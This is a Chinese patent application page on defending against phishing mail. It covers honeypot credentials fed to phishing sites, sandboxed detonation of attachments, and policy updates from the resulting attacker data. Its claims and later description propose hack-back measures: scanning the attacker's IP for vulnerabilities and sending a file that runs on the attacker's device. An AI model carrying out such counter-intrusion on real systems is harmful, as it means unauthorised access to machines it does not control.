CN117278288A - Network attack protection method and device, electronic equipment and storage medium - Google Patents

Network attack protection method and device, electronic equipment and storage medium Download PDF

Info

Publication number
CN117278288A
CN117278288A CN202311261640.3A CN202311261640A CN117278288A CN 117278288 A CN117278288 A CN 117278288A CN 202311261640 A CN202311261640 A CN 202311261640A CN 117278288 A CN117278288 A CN 117278288A
Authority
CN
China
Prior art keywords
attacker
attack
information
attack information
protection
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202311261640.3A
Other languages
Chinese (zh)
Inventor
王瀚
李劼杰
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Beijing QIYI Century Science and Technology Co Ltd
Original Assignee
Beijing QIYI Century Science and Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Beijing QIYI Century Science and Technology Co Ltd filed Critical Beijing QIYI Century Science and Technology Co Ltd
Priority to CN202311261640.3A priority Critical patent/CN117278288A/en
Publication of CN117278288A publication Critical patent/CN117278288A/en
Pending legal-status Critical Current

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1483Countermeasures against malicious traffic service impersonation, e.g. phishing, pharming or web spoofing
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/20Network architectures or network communication protocols for network security for managing network security; network security policies in general
    • H04L63/205Network architectures or network communication protocols for network security for managing network security; network security policies in general involving negotiation or determination of the one or more network security mechanisms to be used, e.g. by negotiation between the client and the server or between peers or by selection according to the capabilities of the entities involved
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L9/00Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L9/40Network security protocols

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

The embodiment of the invention provides a network attack protection method, a device, electronic equipment and a storage medium, which relate to the technical field of information security and are applied to security equipment, wherein the network attack protection method comprises the following steps: acquiring phishing mails in mails sent to a mailbox protected by mail protection equipment; responding to the operation of the fishing mail request in the virtual environment, and obtaining attack information of an attacker corresponding to the fishing mail based on the execution result of the operation; according to the attack information, maintaining a protection strategy; the maintained protection policy is enforced by the attack protection program. The scheme provided by the embodiment of the invention can improve the protection strength to the network attack.

Description

Network attack protection method and device, electronic equipment and storage medium
Technical Field
The present invention relates to the field of information security technologies, and in particular, to a method and apparatus for protecting against network attack, an electronic device, and a storage medium.
Background
Phishing mail is one of the major threats to enterprise network security as a common network attack means. In the prior art, security devices of enterprises generally intercept phishing mails for network attack protection. Thus, the protection of the phishing mails is too passive and the protection force is low.
Disclosure of Invention
The embodiment of the invention aims to provide a network attack protection method, a network attack protection device, electronic equipment and a storage medium, so as to improve the protection degree to network attacks. The specific technical scheme is as follows:
in a first aspect of the present invention, there is provided a network attack protection method applied to a security device, the method including:
acquiring phishing mails in mails sent to a mailbox protected by mail protection equipment;
responding to the operation of the fishing mail request in the virtual environment, and obtaining attack information of an attacker corresponding to the fishing mail based on the execution result of the operation;
according to the attack information, maintaining a protection strategy;
the maintained protection policy is enforced by the attack protection program.
Optionally, the phishing mail comprises connection information of a phishing website;
the operation of responding to the fishing mail request in the virtual environment, based on the execution result of the operation, obtains the attack information of the attacker, and comprises the following steps:
analyzing a website code and/or a network request of the phishing website based on the connection information of the phishing website, and identifying a background interface of the phishing website;
sending monitored honey account number and password information to the attacker equipment through the background interface;
And responding to the attacker to log in the honey account based on the password information, and obtaining a login record of the honey account as attack information of the attacker.
Optionally, the method further comprises:
determining an Internet protocol address of an attacker based on at least one of the website code, the network request and the login record of the phishing website;
and carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
Optionally, the obtaining the login record of the honeypot account, as attack information of the attacker, includes:
and obtaining at least one of the Internet protocol address, the user agent, the equipment fingerprint and the access behavior of the honey account, which are associated with the honey account, as attack information of the attacker.
Optionally, the phishing mail comprises a malicious file, wherein the malicious file comprises a computer virus or a file carrying the computer virus;
the operation of responding to the fishing mail request in the virtual environment, based on the execution result of the operation, obtains the attack information of the attacker, and comprises the following steps:
Analyzing the file type of the malicious file;
operating the malicious file in a sandbox operating environment corresponding to the file type;
and monitoring the operation behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
Optionally, the monitoring the operation behavior of the malicious file, taking the obtained monitoring result as attack information of the attacker, includes:
monitoring a network request generated by running the malicious file, and acquiring an internet protocol address associated with the network request based on a monitoring result as attack information of the attacker;
and/or
And monitoring an execution path of the backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
Optionally, the monitoring the operation behavior of the malicious file, taking the obtained monitoring result as attack information of the attacker, includes:
and monitoring the running behavior of the malicious file, and based on a monitoring result, obtaining file fingerprints of the malicious file and/or registry information of the malicious file as attack information of the attacker.
Optionally, the method further comprises:
Monitoring the operation of the attacker requesting the target server to execute, and obtaining attack information of the attacker based on a monitoring result, wherein the target server is: the phishing mail requests a connected virtual server.
Optionally, the method further comprises:
and inquiring information matched with the obtained attack information of the attacker in a third-party platform to serve as the attack information of the attacker.
Optionally, the maintaining a protection policy according to the attack information includes at least one of the following ways:
according to the attack information, maintaining an interception strategy of the phishing mails;
maintaining a vulnerability restoration strategy according to the attack information;
and maintaining an interference attack behavior strategy according to the attack information.
Optionally, the executing the maintained protection policy by the attack protection program includes:
disconnecting the attacker from the attacker's device by an attack guard;
and/or
And sending false information to the equipment of the attacker through the attack protection program.
In a second aspect of the present invention, there is also provided a network attack protection device, the device including:
the phishing mail obtaining module is used for obtaining phishing mails in mails sent to a mailbox protected by the mail protecting equipment;
The attack information acquisition module is used for responding to the operation of the fishing mail request in the virtual environment and acquiring attack information of an attacker corresponding to the fishing mail based on the execution result of the operation;
the protection strategy maintenance module is used for maintaining a protection strategy according to the attack information;
and the network attack protection module is used for executing the maintained protection strategy through the attack protection program.
Optionally, the phishing mail comprises connection information of a phishing website;
the attack information obtaining module comprises:
the interface identification unit is used for analyzing the website codes and/or the network requests of the phishing websites based on the connection information of the phishing websites and identifying the background interfaces of the phishing websites;
the account sending unit is used for sending the monitored honey account and password information to the attacker equipment through the background interface;
the first attack information obtaining unit is used for responding to the attacker to log in the honey pot account based on the password information and obtaining a login record of the honey pot account as attack information of the attacker.
Optionally, the apparatus further includes:
the address determining module is used for determining an Internet protocol address of an attacker based on at least one of the website code, the network request and the login record of the phishing website;
And the vulnerability scanning module is used for carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
Optionally, the first attack information obtaining unit is specifically configured to obtain at least one of an internet protocol address, a user agent, a device fingerprint associated with the honeypot account, and an access behavior of the honeypot account, as attack information of the attacker.
Optionally, the phishing mail comprises a malicious file, wherein the malicious file comprises a computer virus or a file carrying the computer virus;
the attack information obtaining module comprises:
a file type analysis unit for analyzing the file type of the malicious file;
the file running unit is used for running the malicious files in a sandbox running environment corresponding to the file type;
the second attack information obtaining unit is used for monitoring the operation behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
Optionally, the second attack information obtaining unit is specifically configured to monitor a network request generated by running the malicious file, and obtain, based on a monitoring result, an internet protocol address associated with the network request as attack information of the attacker; and/or monitoring an execution path of the backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
Optionally, the second attack information obtaining unit is specifically configured to monitor an operation behavior of the malicious file, and obtain, based on a monitoring result, a file fingerprint of the malicious file and/or registry information of the malicious file as attack information of the attacker.
Optionally, the apparatus further includes:
the operation monitoring module is used for monitoring the operation of the attacker requesting the target server to execute, and obtaining the attack information of the attacker based on the monitoring result, wherein the target server is: the phishing mail requests a connected virtual server.
Optionally, the apparatus further includes:
and the information inquiry module is used for inquiring the information matched with the obtained attack information of the attacker in the third-party platform to be used as the attack information of the attacker.
Optionally, the protection policy maintenance module is specifically configured to perform at least one of the following manners: according to the attack information, maintaining an interception strategy of the phishing mails; maintaining a vulnerability restoration strategy according to the attack information; and maintaining an interference attack behavior strategy according to the attack information.
Optionally, the network attack protection module is specifically configured to disconnect the attacker from the attacker's device; and/or sending false information to the attacker's device.
In a third aspect of the embodiments of the present invention, there is provided an electronic device including a processor, a communication interface, a memory, and a communication bus, wherein the processor, the communication interface, and the memory perform communication with each other through the communication bus;
a memory for storing a computer program;
and the processor is used for realizing the network attack protection method according to the first aspect when executing the program stored in the memory.
In yet another aspect of the implementation of the present invention, a computer readable storage medium is provided, where a computer program is stored, where the computer program is executed by a processor to implement the network attack protection method according to the first aspect.
According to the network attack protection scheme provided by the embodiment of the invention, the attack information of an attacker can be obtained according to the operation of the phishing mail request by responding to the operation of the phishing mail request in the virtual environment. Since the operations of the phishing mail request are performed in the virtual link, the operations do not cause real attacks, and attack information of an attacker is exposed. The security device may maintain the protection policy according to attack information of an attacker, and execute the maintained protection policy. The protection strategy is maintained based on the obtained attack information of the attacker, and the attack information of the attacker is obtained by collecting the information exposed by the network attack of the attacker in the virtual environment by the security equipment, so that the obtained protection strategy has pertinence to the network attack type of the attacker, and the maintained protection strategy is executed, so that the network attack can be effectively protected. Therefore, by applying the scheme provided by the embodiment of the invention, the protection degree on network attack can be improved.
Drawings
In order to more clearly illustrate the embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly described below.
Fig. 1 is a flow chart of a first network attack protection method according to an embodiment of the present invention;
fig. 2 is a flow chart of a second network attack protection method according to an embodiment of the present invention;
FIG. 3 is a block flow diagram of a first method for obtaining attack information according to an embodiment of the present invention;
fig. 4 is a flow chart of a third network attack protection method according to an embodiment of the present invention;
FIG. 5 is a block flow diagram of a second method for obtaining attack information according to an embodiment of the present invention;
fig. 6 is a schematic structural diagram of a network attack protection device according to an embodiment of the present invention;
fig. 7 is a schematic structural diagram of an electronic device according to an embodiment of the present invention.
Detailed Description
The technical solutions in the embodiments of the present invention will be described below with reference to the accompanying drawings in the embodiments of the present invention.
The execution subject of the scheme provided by the embodiment of the invention is described below.
The execution subject may be a secure device, which may be a desktop, a server, or the like.
The following describes a network attack protection scheme provided by the embodiment of the present invention in detail through a specific embodiment.
Referring to fig. 1, a flow chart of a first network attack protection method is provided, and the method includes the following steps S101-S104.
Step S101: and obtaining the phishing mail in the mails sent to the mailbox protected by the mail protection equipment.
The mail protection device may be a desktop computer, a server, or the like, for example, the mail protection device may be an email protection gateway device, and the mail protection device may also be a device used by a user to log in to an email box.
The protected mailbox may be an email mailbox logged on the security device, or may be a mailbox logged on a device in the same local area network as the security device, which is not limited in the embodiment of the present invention.
The phishing mail is an email with the main purpose of cheating important information of users and spreading malicious programs, and is a network attacker. In general, the fishing mail carries connection information of a fishing website or malicious files.
The manner in which the phishing mail is obtained is described below.
In a first implementation, the mail guard device may identify mail contents of respective mails sent to the protected mailbox, thereby determining phishing mails from the protected mailbox according to the identification result, so that the security device may obtain the phishing mails. For example, the mail guard apparatus may identify a mail including connection information of a website in mail content, and determine whether the website is a phishing website based on the connection information, thereby determining the mail including the connection information of the phishing website as a phishing mail.
The mail protection device may determine whether the website is a phishing website according to the security authentication information of the website, for example, the mail protection device may query the security authentication information of the website from the third party security authentication platform according to the connection information of the website, so as to determine the website not queried for the security authentication information as the phishing website; the mail protection device can also judge whether the website is a phishing website according to the phishing website information stored in the database, specifically, the mail protection device can search whether the phishing website information matched with the phishing website information is stored in the database, and if so, the website is determined to be the phishing website. The embodiment of the present invention is not limited thereto.
In a second implementation, the mail protection device may identify attachments carried by respective mails sent to the protected mailbox, so that phishing mails are determined from the protected mailbox according to the identification result, so that the security device may obtain the phishing mails. For example, the mail guard device may determine that a mail carrying a malicious file is a phishing mail.
Specifically, the mail protection device may identify a digital signature of an attachment carried by the mail, and determine that the attachment without the digital signature is a malicious file. For an attachment with a digital signature, the mail protection device may identify the issuer of the digital signature of the attachment and match the issuer white list recorded in the database, and if the match is unsuccessful, determine that the attachment is a malicious file. Of course, the blacklist of the issuer of the digital signature may also be recorded in the database, in which case the mail protection device may match the issuer of the digital signature of the attachment with the blacklist of the issuer recorded in the database, and if the matching is successful, determine that the attachment is a malicious file.
In addition, mail protection equipment can also use antivirus software to identify the attachment. The embodiment of the present invention is not limited thereto.
In a third implementation manner, the mail protection device may match the sender information of each mail sent to the protected mailbox with the sender information of the phishing mail stored in the database, so as to determine that the mail sent by the matched sender is a phishing mail.
Step S102: responding to the operation of the fishing mail request in the virtual environment, and obtaining attack information of an attacker corresponding to the fishing mail based on the execution result of the operation.
As described in step S101, the phishing mail may carry connection information of the phishing website, and may also carry malicious files. There may be differences in the operations that are requested for phishing mail carrying different content.
For example, for a phishing mail carrying connection information of a phishing website, the operation of the phishing mail request may be to request the user to input own account information and password information in the phishing website; for phishing mail carrying malicious files, the requested operation may be to request downloading and running of the malicious files.
The attack information of the attacker may include: information about an attacker's attack equipment, an attacker's attack intention, etc.
Specifically, the attack information of the obtained attacker and the obtaining manner of the attack information will be further described in different cases, which will not be described in detail herein.
Step S103: and maintaining a protection strategy according to the attack information.
Since attack information of an attacker may include various information, different protection strategies may be maintained based on different attack information.
In particular, the maintenance of the protection strategy in different situations will be further described below and will not be described in detail here.
Step S104: the maintained protection policy is enforced by the attack protection program.
Corresponding to the description of step S103, the execution manner may be different for different protection strategies, and the attack protection procedure may be different. In particular, the execution of the protection strategy in different situations will be further described later, and will not be described in detail here.
By applying the scheme provided by the embodiment of the invention, the operation of the phishing mail request can be responded in the virtual environment, so that the attack information of an attacker can be obtained according to the operation of the phishing mail request. Since the operations of the phishing mail request are performed in the virtual link, the operations do not cause real attacks, and attack information of an attacker is exposed. The security device may maintain the protection policy according to attack information of an attacker, and execute the maintained protection policy through an attack protection program. The protection strategy is maintained based on the obtained attack information of the attacker, and the attack information of the attacker is obtained by collecting the information exposed by the network attack of the attacker in the virtual environment by the security equipment, so that the obtained protection strategy has pertinence to the network attack type of the attacker, and the maintained protection strategy is executed, so that the network attack can be effectively protected. Therefore, by applying the scheme provided by the embodiment of the invention, the protection degree on network attack can be improved.
As described above with respect to step S102, the phishing mail may include different contents therein, and in one case, the phishing mail may include connection information of the phishing website therein.
In response to this situation, in one embodiment of the present invention, referring to fig. 2, a flow chart of a second network attack protection method is provided. In this embodiment, the step S102 may be completed by the following steps S102A to S102C.
Step S102A: based on the connection information of the phishing website, website codes and/or network requests of the phishing website are analyzed, and a background interface of the phishing website is identified.
The installation device may be connected to the phishing website through connection information of the phishing website. The interface of the phishing website is usually disguised as a login interface of a bank, an electronic commerce or an enterprise internal system, so that a user is misled, and the user considers that the interface can send account information and password information input by the user to a server corresponding to the disguised interface. In practice, when the user inputs the account information and the password information of the user in the interface, the phishing website sends the obtained account information and password information to the attack equipment of the attacker through the background interface, so that the attacker can obtain the account information and the password information of the user and log in the account of the user based on the obtained account information and password information.
The security device may analyze the website code of the phishing website, identify the code of the background interface called by the phishing website from the website code, and analyze the network request of the phishing website, and determine the interface called by the phishing website when making the network request as the background interface of the phishing website.
The security device may also obtain the attacker's internet protocol address by analyzing the phishing website's website code and/or the network request.
Step S102B: and sending the monitored honey account number and password information to the attacker equipment through the background interface.
The honey account is preset, no account of a real user exists, and the password information is corresponding to the honey account.
Step S102C: and responding to the login of the honey account by the attacker based on the password information, and obtaining the login record of the honey account as attack information of the attacker.
When an attacker logs in the monitored honeypot account based on the password information, the attacker's device sends a login request to the security device, which can obtain the login request based on the monitoring of the honeypot account. The login request can carry various information, and the security device can obtain the information carried in the login request as attack information of an attacker.
The following describes various cases in which the secure device obtains information carried in a login request as attack information of an attacker.
In the first case, the security device may obtain an internet protocol address associated with the honeypot account carried in the login request as attack information of an attacker.
In the second case, the security device may obtain the user agent associated with the honeypot account carried in the login request as attack information of the attacker.
Specifically, the user agent associated with the honeypot account may include an operating system and version used by an attacker, a CPU type, a browser and version, a browser rendering engine, a browser language, a browser plug-in, and the like.
In the third case, the security device may obtain a device fingerprint associated with the honeypot account carried in the login request, as attack information of an attacker.
For example, the device fingerprint associated with the honeypot account may be a MAC (Media Access Control Address ) address of an attacker's attacking device.
In addition, the security device can also obtain the access behavior of the honeypot account number as attack information of an attacker.
For example, an attacker may access a portion of the database, internal software, or project management platform by logging in to the honeypot account. The security device may record the above-mentioned access behavior as attack information of an attacker.
The security device may obtain information related to any of the above cases as attack information of an attacker, or may obtain a combination of information related to a plurality of cases as attack information of an attacker. The embodiment of the present invention is not limited thereto.
Thus, the security device can obtain various information of the attacker, and the obtained attack information is rich and comprehensive as the attack information of the attacker.
The honey account number and the password information are sent to the equipment of the attacker through a background interface in a phishing website included in the phishing mail, so that the attacker can be induced to log in the honey account number. Because the honeypot account is a monitored account, when an attacker logs in the honeypot account, the security device can obtain the login record of the honeypot account as attack information of the attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by the phishing mail containing link information of the phishing website.
In one embodiment of the present invention, the following steps a-B may be further included on the basis of the embodiment shown in fig. 2.
Step A: and determining the Internet protocol address of the attacker based on at least one of the information of the website code, the network request and the login record of the phishing website.
As described above, the security device may analyze the website code and the network request of the phishing website to obtain the internet protocol address of the attacker.
Specifically, the website code of the phishing website may include the internet protocol address of the attacker, and at this time, the security device may obtain the internet protocol address of the attacker by analyzing the website code of the phishing website.
In addition, the security device may also determine an internet protocol address requested by the network request of the phishing website as an internet protocol address of the attacker.
Specifically, the security device may obtain, based on the format of the network request, an internet protocol address carried in a request header of the network request as an internet protocol address associated with the network request.
The determination of the internet protocol address of the attacker based on the login record is consistent with the description at step S103C above.
And (B) step (B): and carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerability as attack information of the attacker.
The vulnerability scanning may include ping scanning, port scanning, OS (Operating System) detection, vulnerability detection, firewall scanning, etc.
Specifically, ping scans can identify whether an attacker's internet protocol address survives; the port scanning can identify the port opening condition of the equipment corresponding to the Internet protocol address of the attacker; the OS detects operating system information of the device corresponding to the Internet protocol address capable of identifying the attacker; vulnerability detection can identify vulnerabilities existing in devices corresponding to an attacker's internet protocol address; the firewall scan may identify filter rules for the firewall of the device to which the attacker's internet protocol address corresponds.
Thus, vulnerability scanning is carried out on the Internet protocol address of the attacker, vulnerability information of equipment corresponding to the Internet protocol address of the attacker can be obtained, and the vulnerability information is used as attack information of the attacker, so that the variety of the obtained attack information is enriched.
The attack information acquisition method of phishing mail including connection information of a phishing website is described in its entirety.
Referring to fig. 3, a block flow diagram of a first way of obtaining attack information is provided.
It can be seen that after the secure device obtains the phishing mail, the secure device analyzes the phishing website indicated by the connection information in the phishing mail, and specifically, the secure device analyzes the website code and the network request of the phishing website.
Based on the analysis result, the security device sends the honey account number and the password information to the attacker device through the background interface of the phishing website, the honey account number is the monitored account number, and the security device monitors the login of the account number, so that the login information of the account number is obtained and is used as attack information.
In addition, the security device monitors the request sent by the attacker to the virtual server through the account, so that attack information is further obtained.
Based on the above process, the security device may further perform vulnerability scanning on the phishing website, perform vulnerability scanning on the IP address of the attacker according to the IP (Internet Protocol ) address of the attacker in the obtained attack information, and obtain attack information based on the scanning result.
As described above with respect to step S102, the phishing mail may include different content therein, and in one case, malicious files may be included therein.
The malicious files include computer viruses or files carrying computer viruses.
In response to this situation, in one embodiment of the present invention, referring to fig. 4, a flow chart of a third network attack protection method is provided. In this embodiment, the above step S102 may be completed by the following steps S102D to S102F.
Step S102D: the file type of the malicious file is analyzed.
The file types may be text file types, video file format types, audio file format types, picture file format types, executable file format types, etc., each of which may exist in different formats.
Specifically, the security device may analyze the file type of the malicious file in the following manner.
In a first implementation, the security device may determine a file type of the malicious file according to a file extension of the malicious file.
The file extension is a string of characters at the end of the file name. For example, a file name ending with ". Docx" indicates that the file is a Word document, and ". Jpg" indicates that the file is a JPEG image.
In a second implementation, the security device may determine the file type of the malicious file through file header information of the malicious file.
The header information is a piece of content at the beginning of the file and typically contains some specific characters. With these specific characters, the security device can determine the format to which the file belongs. For example, the file header information of a text file typically starts with "0 xefbbbbf", and the file header information of a PDF file typically starts with "% PDF".
Step S102E: and operating the malicious file in the sandboxed operation environment corresponding to the file type.
The sandbox operating environment is a virtual system program, and the programs running inside the sandbox operating environment cannot permanently affect the hard disk.
Malicious files corresponding to different file types, which require different operating environments. For example, for Office documents, the running environment is Office software; for exe files, the running environment is a Windows operating system; for apk files, the running environment is an android operating system.
The security device may create a corresponding sandboxed operating environment based on the file type determined in step S102D.
Step S102F: and monitoring the running behavior of the malicious file, and taking the obtained monitoring result as attack information of an attacker.
The malicious files may be damaged and deleted, a password is sent, keyboard operation information is recorded, doS (Denial of Service ) attacks are recorded, and the like.
The following describes different cases in which the security device obtains attack information of an attacker.
In the first case, the security device may monitor the operation behavior of the malicious file, and obtain, based on the monitoring result, a file fingerprint of the malicious file as attack information of an attacker.
Specifically, the security device may generate a file fingerprint of the malicious file based on a file fingerprint generation algorithm. For example, the security device may generate an MD5 value of the malicious file based on an MD5 (Message-Digest Algorithm) Algorithm as a file fingerprint of the malicious file; the security device may also generate a SHA-1 value for the malicious file based on SHA-1 (Secure Hash Algorithm 1 ) as a file fingerprint for the malicious file.
In the second case, the security device may monitor the operation behavior of the malicious file, and obtain, based on the monitoring result, registry information of the malicious file as attack information of an attacker.
Specifically, when a malicious file runs, own registry information may be generated in the system. The security device may monitor the behavior of malicious files to generate registry information, thereby obtaining the generated registry information.
Similar to the description of the foregoing step S102C, the secure device may obtain information related to any of the above cases as attack information of an attacker, or may obtain a combination of information related to a plurality of cases as attack information of an attacker. The embodiment of the present invention is not limited thereto.
Thus, based on the running behavior of the malicious file, file fingerprints and registry information of the malicious file are obtained and used as attack information of an attacker, and the obtained attack information of the attacker is enriched.
In this way, by running the malicious files included in the phishing mail in the virtual sandbox environment, the running behavior of the malicious files can be monitored under the condition that the malicious files cannot cause real attacks, and the obtained monitoring result is used as attack information of an attacker. In this way, the security device can obtain attack information of an attacker in response to an operation requested by the phishing mail containing the malicious file.
In addition, based on the embodiment shown in fig. 4, in one case, the security device may further monitor the network request generated by running the malicious file, and obtain, based on the monitoring result, the internet protocol address associated with the network request as attack information of the attacker.
Specifically, the security device may acquire, based on the format of the network request, an internet protocol address carried in a request header of the network request as the internet protocol address associated with the network request.
Based on the monitoring of the network request generated by the malicious file, the Internet protocol address associated with the network request is obtained, so that the capability of the security device for obtaining attack information of an attacker can be improved.
In another case, the security device may monitor the execution path of the backdoor program released by the malicious file, and use the execution path as attack information of an attacker.
Therefore, the execution path of the backdoor program released by the malicious file is determined to be the attack information of the attacker, and the obtained attack information of the attacker can be enriched.
In one embodiment of the invention, an attacker can send a request to a server by logging in a honeypot account, and can also send a request to the server by a malicious file. Therefore, in this embodiment, the security device may monitor the operation that the attacker requests the target server to execute, and obtain the attack information of the attacker based on the monitoring result.
Wherein, the target server is: the phishing mail requests a connected virtual server.
The target server is typically a server disguised to have high value for the attack, such as a server containing enterprise business data, to induce a request to the target server from an attacker.
Specifically, based on the monitoring result, the internet protocol address of the attack device of the attacker, the service requested by the attacker, and the like carried in the request sent by the attacker can be obtained as attack information of the attacker.
Thus, the attack information of the attacker is obtained based on the operation of the attacker on the request of the target server, and the capability of the security device for obtaining the attack information of the attacker can be improved.
In one embodiment of the invention, the security device can query the third party platform for information matched with the obtained attack information of the attacker, and the information is used as the attack information of the attacker.
For example, the security device may query, based on the obtained internet protocol address of the attacker, information matching the internet protocol address from the third party platform as attack information of the attacker, where the information may be login information of the attacker logging into the third party platform, such as user agent information, device fingerprint information, and so on. The security device may also query the third party platform for information matching the obtained attacker's attack information based on the obtained attacker's user agent, device fingerprint, etc. The embodiment of the present invention is not limited thereto.
Thus, the attack information of the attacker can be further obtained by inquiring the information matched with the obtained attack information of the attacker in the third-party platform, and the obtained attack information is rich and comprehensive.
The following describes a maintenance method of the protection policy in step S103.
As previously described, since attack information of an attacker may include a variety of information, different protection policies may be maintained based on different attack information.
In a first implementation, the interception policy of the phishing mail may be maintained according to the attack information.
For example, it may be determined that a mail sent by a mail sender of an obtained phishing mail is a phishing mail to be intercepted; the phishing website can be identified based on the obtained information such as the Internet protocol address, the user agent, the device fingerprint and the like of the attacker, so that the mail containing the connection information of the phishing website is determined to be the phishing mail to be intercepted; the malicious files may be identified based on the obtained file fingerprints of the malicious files, registry information, and associated internet protocol addresses, thereby determining that the mail containing the malicious files is a phishing mail to be intercepted.
In a second implementation, the vulnerability restoration policy may be maintained according to the attack information.
Specifically, the security device may determine, according to the operation behavior of the malicious file, a vulnerability that is utilized by the malicious file and a manner of utilizing the vulnerability by the malicious file, and determine, based on the manner of utilizing the malicious file, a repair manner for the vulnerability.
For example, if the malicious file is based on the situation that the system configuration is improper and the vulnerability is utilized, the determined repairing mode of the vulnerability is to modify the system configuration information; for the case that the malicious file utilizes the vulnerability based on the system version being too low, the determined vulnerability repairing mode is to update the system version. In addition, the determined bug repairing mode may be to install a security patch.
In a third implementation, the interference attack behavior policy may be maintained according to the attack information.
For example, the countermeasures sent to the attacker's device may be determined based on the attacker's internet protocol address, thereby interfering with the attacker's attack behaviour.
According to the information content of the obtained attack information, the security device may only maintain one protection policy, or may also maintain multiple protection policies at the same time, which is not limited in the embodiment of the present invention.
In this way, according to the obtained attack information, different protection strategies are maintained, so that the interception capability of the phishing mail in the mails subsequently received by the protected mailbox can be improved, the loopholes possibly utilized by the malicious files can be repaired, the subsequently received attack behaviors can be counteracted, and the protection capability on network attacks is improved.
The following describes a protection method for the network attack in step S104.
Corresponding to the protection policy in step S103, for the maintained interception policy of the phishing mail, the security device may update the interception policy of the mail protection device, so that the mail protection device intercepts the phishing mail according to the interception policy; for the maintained vulnerability restoration strategy, the security device restores the vulnerability according to the vulnerability restoration strategy; for the maintained interference attack behavior strategy, the security device will interfere with the attack behavior of the attacker according to the interference attack behavior strategy.
Specifically, for the attack behavior of the interfering attacker, there may be the following two cases.
In one case, the security device may disconnect the attacker from the attacker's device through an attack guard.
For example, the security device may send the countered file to the attacker's device via the attack guard according to the internet protocol address of the attacker's device, and disconnect the attacker from the attacker's device by countering the file running in the attacker's device.
In this case, the attack protection program is a program for controlling the copy-back file.
In another case, the security device may send false information to the attacker's device through the attack guard.
Specifically, the security device may send false information to the attacker's device through the attack protection program according to the internet protocol address of the attacker's device, so that the attacker is difficult to distinguish the information required by the actual attack intention, thereby interfering with implementing the attack intention of the attacker.
In this case, the attack protection program is a program that transmits information.
The attack behavior of the attacker is countered, the network attack by the attacker can be interfered, the attacker is difficult to realize the attack intention, and the protection capability of the network attack is improved.
The attack information acquisition method of the phishing mail including the malicious file is described in its entirety as follows.
Referring to fig. 5, a flow diagram of a second way of obtaining attack information is provided.
Similarly to fig. 3, after the secure device obtains the phishing mail, the secure device analyzes the malicious file in the phishing mail to determine the file type of the malicious file, thereby creating a sandbox environment corresponding to the file type of the malicious file, operating the malicious file in the sandbox environment, monitoring the operation of the malicious file, and obtaining attack information based on the monitoring result.
Based on the above process, the security device may further perform vulnerability scanning on the IP address of the attacker according to the IP (Internet Protocol ) address of the attacker in the obtained attack information, and obtain attack information based on the scanning result.
Corresponding to the network attack protection method, the embodiment of the invention also provides a network attack protection device.
Referring to fig. 6, there is provided a schematic structural diagram of a network attack protection device, the device including:
a phishing mail obtaining module 601, configured to obtain a phishing mail from mails sent to a mailbox protected by the mail protection device;
an attack information obtaining module 602, configured to respond to an operation of a fishing mail request in a virtual environment, and obtain attack information of an attacker corresponding to the fishing mail based on an execution result of the operation;
A protection policy maintenance module 603, configured to maintain a protection policy according to the attack information;
the network attack guard module 604 is configured to execute the maintained guard policy through the attack guard program.
By applying the scheme provided by the embodiment of the invention, the operation of the phishing mail request can be responded in the virtual environment, so that the attack information of an attacker can be obtained according to the operation of the phishing mail request. Since the operations of the phishing mail request are performed in the virtual link, the operations do not cause real attacks, and attack information of an attacker is exposed. The security device may maintain the protection policy according to attack information of an attacker, and execute the maintained protection policy. The protection strategy is maintained based on the obtained attack information of the attacker, and the attack information of the attacker is obtained by collecting the information exposed by the network attack of the attacker in the virtual environment by the security equipment, so that the obtained protection strategy has pertinence to the network attack type of the attacker, and the maintained protection strategy is executed, so that the network attack can be effectively protected. Therefore, by applying the scheme provided by the embodiment of the invention, the protection degree on network attack can be improved.
In one embodiment of the invention, the phishing mail includes connection information of a phishing website;
the attack information acquisition module 602 includes:
the interface identification unit is used for analyzing the website codes and/or the network requests of the phishing websites based on the connection information of the phishing websites and identifying the background interfaces of the phishing websites;
the account sending unit is used for sending the monitored honey account and password information to the attacker equipment through the background interface;
the first attack information obtaining unit is used for responding to the attacker to log in the honey pot account based on the password information and obtaining a login record of the honey pot account as attack information of the attacker.
